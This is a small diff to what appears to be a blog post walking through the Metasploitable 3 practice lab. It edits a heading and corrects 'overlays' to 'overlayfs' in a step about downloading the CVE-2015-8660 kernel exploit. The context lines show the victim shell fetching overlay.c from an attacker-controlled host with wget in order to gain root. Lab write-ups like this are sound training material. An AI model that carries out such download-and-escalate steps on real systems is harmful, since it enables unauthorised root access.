ricobandy/ricobandy.github.io/_posts/2020-04-08-metasploitable-3-irc.md

 ---
 ```

-#### Gaining root using the kernel exploit overlays(CVE-2015-8660)
+### Gaining root using the kernel exploit overlays(CVE-2015-8660)

-We can go ahead and download the overlays exploit from [here](http://www.exploit-db.com/exploits/39230), send it over to the victim machine and then compile the script to an executable and run it so as to gain the root shell:
+We can go ahead and download the overlayfs exploit from [here](http://www.exploit-db.com/exploits/39230), send it over to the victim machine and then compile the script to an executable and run it so as to gain the root shell:

 ```
 boba_fett@metasploitable3-ub1404:~$ wget http://192.168.4.129/overlay.c